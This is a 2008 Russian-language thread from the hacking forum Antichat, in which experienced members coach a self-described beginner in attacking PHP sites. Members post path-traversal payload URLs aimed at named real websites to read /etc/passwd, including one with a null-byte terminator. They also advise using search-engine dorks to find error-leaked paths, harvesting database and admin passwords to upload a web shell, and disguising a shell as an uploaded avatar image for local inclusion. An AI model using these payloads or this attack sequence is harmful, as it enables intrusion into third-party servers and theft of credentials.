Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.12.2008, 14:22
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
rip86
http://сайт/index.php?p=http://шелл.txt - это видимо просто фрейм или чтто типо того ..
инклуд шелла, происходит если в скрипте было бы прописано include($_GET['p']); или нечто подобное ..
а тут чтото вроде echo '<iframe src="'.$_GET['p'].'"></iframe>';
---------
http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd
ну конечно смотря какие права есть .. но можно найти пути по ошибкам, потом поискать конфы сервера, пассы от мускуля/админок чтоб шелл залить ..
|
|
|
11.12.2008, 14:35
|
|
Новичок
Регистрация: 24.09.2008
Сообщений: 12
Провел на форуме:
65637
Репутация:
0
|
|
точно, сорри, там фрейм был ... а на другом через серч форму сайт инклудился
ясно, вобщем при реальном инклуде с шелл.txt должно работать все?
http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd
... пассы от мускуля/админок чтоб шелл залить ..
А где их можно поискать и как? Слышал про то, что пассы иногда хранятся в etc/shadow , Но на практике такого не видел ... |
|
|
|
11.12.2008, 14:47
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
оч редко быват, что есть права прочитать файлы из шадоу .. да и не обязательно в шадоу ..
пути искать в ошибках, попробуй ввести заведомо ложный путь..
поищи в гугле "site:сайт.ком AND warning OR mysql OR include" итд ..
|
|
|
|
11.12.2008, 15:01
|
|
Новичок
Регистрация: 24.09.2008
Сообщений: 12
Провел на форуме:
65637
Репутация:
0
|
|
то есть?
ну допустим возьмем инъекцию
http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/passwd%00
что нам дают эти данные? что дальше?
пути искать в ошибках, попробуй ввести заведомо ложный путь..
поищи в гугле "site:сайт.ком AND warning OR mysql OR include" итд ..
site:www.cs.rmit.edu.au AND warning OR mysql OR include
а что в итоге мы ищем?
Последний раз редактировалось rip86; 11.12.2008 в 15:17..
|
|
|
|
11.12.2008, 15:03
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
rip86, читай внимательнее
но можно найти пути по ошибкам, потом поискать конфы сервера, пассы от мускуля/админок чтоб шелл залить ..
|
|
|
|
11.12.2008, 15:05
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
можно залить картинку с шелом и её проинклудить к примеру
|
|
|
|
11.12.2008, 15:20
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
ну допустим возьмем инъекцию
http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/passwd%00
Что-что, если есть sql-inj на этом же сайте, то данная информация может нам помочь загрузить шелл через скулю, потому что других путей узнать реальный путь к серверу может и не быть. В этой же теме странички две-три назад Tigger приводил неплохой пример SQL-inj с использованием загрузки /etc/passwd, который был доведен до победного конца. Читай тему
|
|
|
|
11.12.2008, 15:26
|
|
Новичок
Регистрация: 24.09.2008
Сообщений: 12
Провел на форуме:
65637
Репутация:
0
|
|
Сообщение от 159932
rip86, читай внимательнее
поверь, я перечитываю по несколько раз 
просто реально не понимаю, что нам дает этот запрос в гугле ... что значит найти пути по ошибкам и где искать пассы админок ... 
сорри, говорю же, я нуб
мб статейку какую-нибудь мне посоветуете прочитать? читал много, но они либо совсем поверхностные, либо совсем уж углубленные (не для новичка вобщем).
Spyder
можно залить картинку с шелом и её проинклудить к примеру
а почему бы тогда не инклудить сразу шелл, зачем в картинку прятать? или ты имеешь ввиду залить картинку на тот сервак, который ломаем посредством админки?
|
|
|
|
11.12.2008, 15:29
|
|
Новичок
Регистрация: 24.09.2008
Сообщений: 12
Провел на форуме:
65637
Репутация:
0
|
|
Что-что, если есть sql-inj на этом же сайте, то данная информация может нам помочь загрузить шелл через скулю, потому что других путей узнать реальный путь к серверу может и не быть. В этой же теме странички две-три назад Tigger приводил неплохой пример SQL-inj с использованием загрузки /etc/passwd, который был доведен до победного конца. Читай тему
ок, пошел читать 
просто не особо пока хотел вникать в sql-inj , хотел сначала с пхп inj разобраться полностью ... но чувствую придется
|
|
|
|
11.12.2008, 15:33
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
а почему бы тогда не инклудить сразу шелл, зачем в картинку прятать? или ты имеешь ввиду залить картинку на тот сервак, который ломаем посредством админки?
если инклуд локальный, и на сайте есть к примеру рега для юзеров и можно залить аватар или чтото типо того, то можно с картинкой залить шелл, ну а потом и использовать ))
--
немного поиска по форуму)
https://forum.antichat.ru/thread23501-php+%E8%ED%EA%EB%F3%E4.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
